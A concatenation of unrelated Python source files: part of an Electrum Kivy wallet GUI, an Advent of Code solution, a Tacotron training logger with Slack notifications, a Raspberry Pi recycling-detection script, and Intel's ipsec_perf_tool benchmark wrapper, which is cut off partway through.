self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
aoc_day_18.py
|
from multiprocessing import Event, Pipe, Process, Queue, Value
from collections import defaultdict
from functools import wraps
class Registers:
def __init__(self, program_id, queue_out, queue_in, event, instructions,
counter=None):
self.registers = defaultdict(int)
self.registers['p'] = int(program_id)
self.queue_out = queue_out
self.queue_in = queue_in
self.event = event
self.instructions = instructions
self.instruction_pointer = 0
self.counter = counter
def _sanitize_inputs(fn):
@wraps(fn)
def wrapper(self, *args):
def sanitize(val):
return val if val.isalpha() else int(val)
if len(args) == 1:
return fn(self, sanitize(args[0]))
else:
x = sanitize(args[0])
y = sanitize(args[1])
y = self.registers.get(y, y)
return fn(self, x, y)
return wrapper
def is_set(self):
return self.event.is_set()
@_sanitize_inputs
def send(self, x):
if self.counter:
self.counter.value += 1
self.queue_out.put(self.registers[x])
@_sanitize_inputs
def set_register(self, x, y):
self.registers[x] = y
@_sanitize_inputs
def add_to_register(self, x, y):
self.registers[x] += y
@_sanitize_inputs
def multiply_register(self, x, y):
self.registers[x] *= y
@_sanitize_inputs
def mod_register(self, x, y):
self.registers[x] %= y
def recover(self, x):
self.event.set()
while self.queue_in.empty():
pass
self.registers[x] = self.queue_in.get()
self.event.clear()
@_sanitize_inputs
def jump_size(self, x, y):
return y if self.registers.get(x, x) > 0 else 1
@property
def action_map(self):
return {
'snd': self.send,
'set': self.set_register,
'add': self.add_to_register,
'mul': self.multiply_register,
'mod': self.mod_register,
'rcv': self.recover,
'jgz': self.jump_size
}
def start(self):
while True:
action, params = self.instructions[self.instruction_pointer]
step = self.action_map[action](*params)
if step and isinstance(step, str):
print(action, params, step, self.registers.get('p'))
try:
self.instruction_pointer += step or 1
except:
print(action, type(self.instruction_pointer), type(step))
raise
def solution(instructions):
def run(register):
register.start()
a, b = Queue(), Queue()
counter = Value('i')
register_0 = Registers(0, a, b, Event(), instructions)
register_1 = Registers(1, b, a, Event(), instructions, counter=counter)
proc_1 = Process(target=run, args=(register_0,))
proc_1.daemon = True
proc_1.start()
proc2 = Process(target=run, args=(register_1,))
proc2.daemon = True
proc2.start()
while (not (register_0.is_set() and register_1.is_set())
or (a.qsize() or b.qsize())):
pass
return counter.value
if __name__ == '__main__':
with open('aoc_day_18_input.txt', 'r') as f:
instructions = [(line.split()[0], line.split()[1:])
for line in f.readlines()]
print(f'Part 2: {solution(instructions)}')
|
infolog.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from npu_bridge.npu_init import *
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = "%Y-%m-%d %H:%M:%S.%f"
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, "a")
_file = open(filename, "a")
_file.write("\n-----------------------------------------------------------------\n")
_file.write("Starting new {} training run\n".format(run_name))
_file.write("-----------------------------------------------------------------\n")
_run_name = run_name
_slack_url = slack_url
def log(msg, end="\n", slack=False):
#print(msg, end=end)
if _file is not None:
_file.write("[%s] %s\n" % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header("Content-Type", "application/json")
urlopen(req, json.dumps({
"username": "tacotron",
"icon_emoji": ":taco:",
"text": "*%s*: %s" % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
detection.py
|
from imutils.video import VideoStream
from multiprocessing import Process
from multiprocessing import Queue
import numpy as np
import imutils
import time
import cv2
from led import turn_on, turn_off
import datetime as dt
START_TIME = dt.datetime.now()
# load the class labels from disk
rows = open("synset_words.txt").read().strip().split("\n")
CLASSES = [r[r.find(" ") + 1:].split(",")[0] for r in rows]
COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))
CONFIDENCE = 0.7
# Categories of paper, plastic, and other
CATEGORIES = {
"water bottle": "plastic",
"water jug": "plastic",
"plastic bag": "plastic",
"envelope": "paper",
"notebook": "paper",
"book jacket": "paper",
"toilet tissue": "paper",
"packet": "plastic",
"mouse": "trash",
"beaker": "plastic",
"tvmonitor": "trash",
"cellular telephone": "trash",
"cellular phone": "trash",
"cellphone": "trash",
"mobile phone": "trash",
}
# Passes the input frame and extracts detections
def get_detections(network, inputQ, outputQ):
while True:
if not inputQ.empty():
frame = inputQ.get()
frame = cv2.resize(frame, (224, 224))
blob = cv2.dnn.blobFromImage(frame, 1, (224, 224), (104, 117, 123))
# input blob to neural net
network.setInput(blob)
detections = network.forward()
# set as new output
outputQ.put(detections)
# Start a process which continuously runs get_detections
def start_background_detections(network, inputQ, outputQ):
p = Process(target=get_detections, args=(network, inputQ, outputQ,))
p.daemon = True
p.start()
# def get_led_states(plastic_state, other_state):
# while True:
# if plastic_state:
# turn_on("plastic")
# plastic_state = 0
# elif other_state:
# turn_on("other")
# other_state = 0
#
#
# # Start a process which continuously runs get_detections
# def start_background_leds(plastic_state, other_state):
# p = Process(target=get_led_states, args=(plastic_state, other_state))
# p.daemon = False
# p.start()
# Start the Picamera video stream
def start_video_stream():
vs = VideoStream(usePiCamera=True).start()
time.sleep(2.0)
return vs
# reads the width and height values of the box from the frame
def read_frame(vs):
frame = vs.read()
frame = imutils.resize(frame, width=400)
(frHeight, frWidth) = frame.shape[:2]
return frame, frHeight, frWidth
# Modifies input and output Queues
def check_queues(frame, detections, inputQ, outputQ):
if inputQ.empty():
inputQ.put(frame)
if not outputQ.empty():
detections = outputQ.get()
return detections, inputQ, outputQ
def ledCheck(itemstr):
if itemstr in CATEGORIES:
plastic_state = 1
turn_on(itemstr)
else:
other_state = 1
turn_on(itemstr)
# check to see if there are detections in the frame
def check_detections(frame, detections, frHeight, frWidth):
# Gets highest confidence level detection and displays it on the frame
idx = np.argsort(detections[0])[::-1][:5]
turn_off()
for(i, idx) in enumerate(idx):
itemstr = CLASSES[idx]
#ledCheck(itemstr)
if (detections[0][idx] > 0.150101):
if itemstr in CATEGORIES:
turn_on(CATEGORIES[itemstr])
text = "Label: {}, {:.2f}%".format(itemstr,
detections[0][idx] * 100)
cv2.putText(frame, text, (5, 25), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 255), 2)
break
#print("[INFO] {}. label: {}, probability: {:.5}".format(i+1, CLASSES[idx], detections[0][idx]),)
return idx, itemstr
# Extract the index of the class label from the detections and compute x, y
# co-ordinates
def extract_classes(detections, i, frWidth, frHeight):
idx = int(detections[0, 0, i, 1])
dims = np.array([frWidth, frHeight, frWidth, frHeight])
box = detections[0, 0, i, 3:7] * dims
(startX, startY, endX, endY) = box.astype("int")
return idx, startX, startY, endX, endY
# Draw the prediction box on the frame
def draw_frames(idx, frame, startX, startY, endX, endY):
label = "{}: {:.2f}%".format(CLASSES[idx],
CONFIDENCE * 100)
cv2.rectangle(frame, (startX, startY), (endX, endY),
COLORS[idx], 2)
y = startY - 15 if startY - 15 > 15 else startY + 15
cv2.putText(frame, label, (startX, y),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)
def determine_category():
pass
|
ipsec_perf_tool.py
|
#!/usr/bin/env python3
"""
**********************************************************************
Copyright(c) 2021, Intel Corporation All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
* Neither the name of Intel Corporation nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
**********************************************************************
"""
import threading
import queue
import os
import sys
import subprocess
import platform
import time
import argparse
import textwrap
# number of variants to run
TOTAL_VARIANTS = 0
# dictionary to store env vars
ENVS = None
# queues to store todo and completed variants
TODO_Q = None
DONE_Q = None
# don't output info to stderr if set
QUIET = False
# perf application name
PERF_APP = ''
# exit on error flag
EXIT_ERROR = False
class Variant:
"""Class to setup and run test case variant"""
def __init__(self, idx=None, arch=None, direction='encrypt', cipher_alg=None,
hash_alg=None, aead_alg=None, sizes=None, offset=None,
cold_cache=False, shani_off=False, gcm_job_api=False,
unhalted_cycles=False, quick_test=False, smoke_test=False,
imix=None, aad_size=None, job_iter=None):
"""Build perf app command line"""
global PERF_APP
self.idx = idx
self.arch = arch
self.direction = direction
self.cipher_alg = cipher_alg
self.hash_alg = hash_alg
self.aead_alg = aead_alg
self.sizes = sizes
self.offset = offset
self.cmd = '{} --no-progress-bar '.format(PERF_APP)
self.cmd_output = ''
self.out = []
self.core = None
self.cold_cache = cold_cache
self.shani_off = shani_off
self.gcm_job_api = gcm_job_api
self.unhalted_cycles = unhalted_cycles
self.quick_test = quick_test
self.smoke_test = smoke_test
self.imix = imix
self.aad_size = aad_size
self.job_iter = job_iter
if self.arch is not None:
self.cmd += ' --arch {}'.format(self.arch)
if self.offset is not None:
self.cmd += ' -o {}'.format(self.offset)
if self.aead_alg is not None:
if self.cipher_alg is not None or \
self.hash_alg is not None:
print("Invalid combination: aead + cipher / hash", \
file=sys.stderr)
sys.exit(1)
self.cmd += ' --aead-algo {}'.format(self.aead_alg)
if self.cipher_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + cipher", file=sys.stderr)
sys.exit(1)
self.cmd += ' --cipher-algo {}'.format(self.cipher_alg)
if self.hash_alg is not None:
if self.aead_alg is not None:
print("Invalid combination: aead + hash", file=sys.stderr)
sys.exit(1)
self.cmd += ' --hash-algo {}'.format(self.hash_alg)
if self.cipher_alg is not None or \
self.aead_alg is not None:
self.cmd += ' --cipher-dir {}'.format(self.direction)
if self.sizes is not None:
self.cmd += ' --job-size {}'.format(self.sizes)
if self.cold_cache is True:
self.cmd += ' -c'
if self.shani_off is True:
self.cmd += ' --shani-off'
if self.gcm_job_api is True:
self.cmd += ' --gcm-job-api'
if self.unhalted_cycles is True:
self.cmd += ' --unhalted-cycles'
if self.quick_test is True:
self.cmd += ' --quick'
if self.smoke_test is True:
self.cmd += ' --smoke'
if self.imix is not None:
self.cmd += ' --imix {}'.format(self.imix)
if self.aad_size is not None:
self.cmd += ' --aad-size {}'.format(self.aad_size)
if self.job_iter is not None:
self.cmd += ' --job-iter {}'.format(self.job_iter)
def run(self):
"""Run perf app and store output"""
try:
self.cmd_output = \
subprocess.run(self.cmd, \
stdout=subprocess.PIPE, \
stderr=subprocess.PIPE, \
shell=True, env=ENVS, \
check=True).stdout.decode('utf-8')
return True
except subprocess.CalledProcessError as e:
self.cmd_output = e.stderr.decode('utf-8')
return False
def set_core(self, core):
"""Set core to run perf app on"""
self.core = core
mask = 1 << core
self.cmd += ' --cores {}'.format(str(hex(mask)))
def get_output(self):
"""Get output from run"""
return self.cmd_output
def get_cmd(self):
"""Get variant command line"""
return self.cmd
def get_idx(self):
"""Get assigned index"""
return self.idx
def get_info(self):
"""Get variant details"""
if self.idx is None:
idx = ''
else:
idx = self.idx
if self.cipher_alg is None:
cipher_alg = ''
else:
cipher_alg = self.cipher_alg
if self.hash_alg is None:
hash_alg = ''
elif cipher_alg == '':
hash_alg = self.hash_alg
else:
hash_alg = ' + ' + self.hash_alg
if self.aead_alg is None:
aead_alg = ''
else:
aead_alg = self.aead_alg
if self.core is None:
core = ''
else:
core = self.core
if self.direction is None:
direction = 'n/a'
else:
direction = self.direction
alg = '{}{}{}'.format(cipher_alg, hash_alg, aead_alg)
info = '{0:<5} {1:<4} {2:<6} {3:<7} {4:<40}'\
.format(idx, core, self.arch, direction, alg)
return info
def init_global_vars():
"""Initialize global variables"""
global TOTAL_VARIANTS
global ENVS
global TODO_Q
global DONE_Q
global QUIET
global PERF_APP
# init vars
TOTAL_VARIANTS = 0
QUIET = False
# include perf directory in PATH
path = '{}:{}'.format(os.getenv('PATH'), os.getenv('PWD'))
# set LD_LIBRARY_PATH if not already set
lib_path = os.getenv('LD_LIBRARY_PATH')
if lib_path is None:
lib_path = '../lib'
# create env vars dictionary to pass to subprocess module
ENVS = {'PATH' : path, 'LD_LIBRARY_PATH' : lib_path}
# init queues to store todo and completed variants
TODO_Q = queue.Queue()
DONE_Q = queue.Queue()
# detect OS and select app name
if platform.system() == 'Windows':
PERF_APP = 'ipsec_perf.exe'
else:
PERF_APP = 'ipsec_perf'
def get_info():
"""get system and app info from perf app output"""
global PERF_APP
archs = None
best_arch = None
cipher_algos = None
hash_algos = None
aead_algos = None
cmd = PERF_APP + ' --print-info'
try:
res = subprocess.run(cmd, stdout=subprocess.PIPE, \
stderr=subprocess.STDOUT, \
env=ENVS, shell=True, check=True)
output = res.stdout.decode('utf-8')
except subprocess.CalledProcessError as e:
print("Error (" + str(e.returncode) + ")")
print(e.output.decode('utf-8'))
sys.exit(1)
lines = output.rstrip().split('\n')
try:
for line in lines:
info = line.split(':')
if info[0] == 'Supported architectures':
archs = info[1].split()
if info[0] == 'Best architecture':
best_arch = info[1].split()
if info[0] == 'Supported cipher algorithms':
cipher_algos = info[1].split()
if info[0] == 'Supported hash algorithms':
hash_algos = info[1].split()
if info[0] == 'Supported aead algorithms':
aead_algos = info[1].split()
except:
print("Error parsing --print-info output:\n" \
"{}".format(output), file=sys.stderr)
if archs is None or best_arch is None or cipher_algos is None \
or hash_algos is None or aead_algos is None:
print("Error parsing system and app information", file=sys.stderr)
sys.exit(1)
return archs, best_arch, cipher_algos, hash_algos, aead_algos
def parse_cores(core_str):
"""Parse core list passed through command line"""
num_cores = os.cpu_count()
cores = []
# remove spaces
core_str.replace(" ", "")
# check if not a range
if '-' not in core_str:
cores = list(map(int, core_str.strip().split(',')))
else:
# parse range e.g. 2-8
core_str = core_str.strip().split('-')
for i in range(int(core_str[0]), int(core_str[1]) + 1):
cores.append(i)
# ensure valid cores specified
for core in cores:
if core < 0 or core >= num_cores:
print("Core {} out of range!".format(core), file=sys.stderr)
raise Exception()
return cores
def parse_results(variants):
"""Parse output of perf app for variant"""
out = []
# set header
lines = variants[0].get_output().split('\n')
for line in lines[:-1]:
out.append(line.split('\t')[0])
# append output for all variants to single list
for var in variants:
lines = var.get_output().split('\n')
for i in range(0, len(lines) - 1):
out[i] += '\t{}'.format(lines[i].split()[1])
return out
def parse_args():
"""Parse command line arguments"""
global QUIET
cores = None
directions = ['encrypt', 'decrypt']
offset = 24
alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']
parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,
description="Wrapper script for the ipsec-mb " \
"performance application enabling extended functionality")
# parse and validate args
parser.add_argument("-a", "--arch", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],
default=None, action='append',
help="set architecture to test (default tests all supported archs)")
parser.add_argument("-c", "--cores", default=cores,
help="list/range of cores e.g. 2-8 or 3,4,5")
parser.add_argument("-d", "--direction", default=None,
choices=directions, help="Cipher direction")
parser.add_argument("-o", "--offset", default=offset, type=int,
help="offset for the SHA size increment, default is 24")
parser.add_argument("-t", "--alg-type", default=None, action='append', choices=alg_types,
help="algorithm types to test")
parser.add_argument("-s", "--job-size", default=None,
help=textwrap.dedent('''\
size of the cipher & hash job in bytes.
It can be:
- single value: test single size
- list: test multiple sizes separated by commas
- range: test multiple sizes with following format
min:step:max (e.g. 16:16:256)\n'''))
parser.add_argument("-q", "--quiet", default=False, action='store_true',
help="disable verbose output")
parser.add_argument("--cold-cache", default=False, action='store_true',
help="use cold cache, it uses warm as default")
parser.add_argument("--arch-best", action='store_true',
help="detect available architectures and run only on the best one")
parser.add_argument("--shani-off", action='store_true', help="don't use SHA extensions")
parser.add_argument("--gcm-job-api", action='store_true',
help="use JOB API for GCM perf tests (raw GCM API is default)")
parser.add_argument("--unhalted-cycles", action='store_true',
help=textwrap.dedent('''\
measure using unhalted cycles (requires root).
Note: RDTSC is used by default'''))
parser.add_argument("--quick", action='store_true',
help=textwrap.dedent('''\
reduces number of test iterations by x10
(less precise but quicker)'''))
parser.add_argument("--smoke", action='store_true',
help=textwrap.dedent('''\
very quick, imprecise and without print out
(for validation only)'''))
parser.add_argument("--imix", default=None,
help=textwrap.dedent('''\
set numbers that establish occurrence proportions between packet sizes.
It requires a list of sizes through --job-size.
(e.g. --imix 4,6 --job-size 64,128 will generate
a series of job sizes where on average 4 out of 10
packets will be 64B long and 6 out of 10 packets
will be 128B long)'''))
parser.add_argument("--aad-size", default=None, type=int,
help="size of AAD for AEAD algorithms")
parser.add_argument("--job-iter", default=None, type=int,
help="number of tests iterations for each job size")
args = parser.parse_args()
# validate and convert values where necessary
if args.arch is not None and args.arch_best is True:
print("{}: error: argument -a/--arch cannot be used with " \
"--arch-best".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.cores is not None:
try:
cores = parse_cores(args.cores)
except:
print("{}: error: argument -c/--cores: invalid value " \
"{}".format(sys.argv[0], args.cores), file=sys.stderr)
sys.exit(1)
if args.imix is not None and args.job_size is None:
print("{}: error: argument --imix must be used with " \
"--job-size".format(sys.argv[0]), file=sys.stderr)
sys.exit(1)
if args.alg_type is not None:
alg_types = args.alg_type
else:
# strip all cipher hash combinations in default run
alg_types = alg_types[:-1]
if args.direction is not None:
directions = [args.direction]
if args.quiet is True:
QUIET = True
return args.arch, cores, directions, args.offset, \
alg_types, args.job_size, args.cold_cache, args.arch_best, \
args.shani_off, args.gcm_job_api, args.unhalted_cycles, \
args.quick, args.smoke, args.imix, \
args.aad_size, args.job_iter
def run_test(core=None):
"""
Main processing thread function
1. Dequeue variants from todo queue until empty
2. Run performance test for variant
3. Place completed variants in completed (done) queue
"""
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
while TODO_Q.empty() is False:
variant = TODO_Q.get()
# skip if error encountered
if EXIT_ERROR is True:
if QUIET is False:
print('{} {}'.format(variant.get_info(), '...skipped'), file=sys.stderr)
TODO_Q.task_done()
continue
# set core if specified
if core is not None:
variant.set_core(core)
# print variant information
if QUIET is False:
print(variant.get_info(), file=sys.stderr)
# run variant
if variant.run() is False:
print('Error encountered running: {}\nOutput:\n{}'\
.format(variant.get_cmd(),
variant.get_output()),
file=sys.stderr)
EXIT_ERROR = True
DONE_Q.put(variant)
TODO_Q.task_done()
def main():
"""
Main function to:
- parse command line args
- generate and enqueue list of variants to run
- schedule variants across selected cores
- post process results and print to stdout
"""
global TOTAL_VARIANTS
global QUIET
global TODO_Q
global DONE_Q
global EXIT_ERROR
